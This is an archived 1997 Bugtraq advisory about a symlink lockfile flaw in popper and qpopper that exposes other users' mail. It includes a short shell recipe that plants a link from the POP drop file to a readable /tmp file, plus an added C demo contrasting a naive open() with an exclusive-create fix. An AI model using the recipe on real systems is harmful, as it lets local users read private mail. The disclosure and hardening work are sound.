Popper and qpopper symlink hole
Description: qpopper and popper use an insecure lockfile creation mechanism that allows you to read other people's mail.
Author: dynamo@IME.NET
Compromise: Read other people's mail when they fetch it via pop.
Vulnerable Systems: Those running vulnerable versions of popper and qpopper. Probably those below version 2.2
Date: 7 August 1997
Date: Thu, 7 Aug 1997 21:04:47 -0400
From: dynamo@IME.NET
To: BUGTRAQ@NETSPACE.ORG
Subject: popper and qpopper let you read email from other pop clients

When I found this, I checked the archive to see if anyone else had found
this, and it didn't look like it. If it's a repost of ideas, sorry.

Some versions of popper and qpopper from qualcomm allow you to read
other people's email. There are quite a few situations in which you
need your mail spool directory chmodded 1777. If you have local users
on a machine with the mail spool directory, they can create symbolic
links from the temporary pop drop box to a file that they can read.

See if you're vulnerable:
1) touch /tmp/lumpy; chmod 777 /tmp/lumpy
2) ln -s /tmp/lumpy /var/mail/.luser.pop
3) wait for them to check their email.
4) while they are reading it from the pop
server, look at the file in the tmp dir.
Apparently it is fixed in the newest version.
dynamo
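
The weakness described in the post, shown as an added example (not qpopper's source and not part of the original message): a create-or-reuse open() that follows a pre-existing link, beside an exclusive create that refuses it. The function names and the scratch directory under /tmp are assumptions; the demo works only inside its own temporary directory, not a real mail spool.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive pattern: create-or-reuse whatever the name resolves to, so a
 * pre-planted symlink redirects the mail copy into the link's target. */
static int open_drop_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0600);
}

/* Hardened pattern: with O_CREAT, O_EXCL makes open() fail with EEXIST when
 * the name already exists, symlinks (even dangling ones) included. fstat()
 * then confirms a private regular file with a single link. */
static int open_drop_safe(const char *path) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd); return -1;
    }
    return fd;
}

/* Constructed scratch "spool" with a planted symlink; returns how many bytes
 * of a test message ended up in the link target (-1 on setup failure). */
static long leaked_bytes(int use_safe) {
    char dir[] = "/tmp/spoolXXXXXX", drop[64], target[64];
    const char *msg = "Subject: private\n";   /* constructed sample */
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/lumpy", dir);
    snprintf(drop, sizeof drop, "%s/.luser.pop", dir);
    int t = open(target, O_WRONLY | O_CREAT, 0666); if (t >= 0) close(t);
    int planted = symlink(target, drop);
    int fd = use_safe ? open_drop_safe(drop) : open_drop_naive(drop);
    if (fd >= 0) { if (write(fd, msg, strlen(msg)) < 0) perror("write"); close(fd); }
    long n = (planted == 0 && stat(target, &st) == 0) ? (long)st.st_size : -1;
    unlink(drop); unlink(target); rmdir(dir);
    return n;
}

int main(void) {
    printf("naive: %ld leaked, safe: %ld leaked\n", leaked_bytes(0), leaked_bytes(1));
    return 0;
}
```

Keeping per-user temporary drop files out of a world-writable directory removes the precondition entirely; the exclusive create is the fallback when the spool has to stay mode 1777.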
This page is part of Fyodor's exploit
world.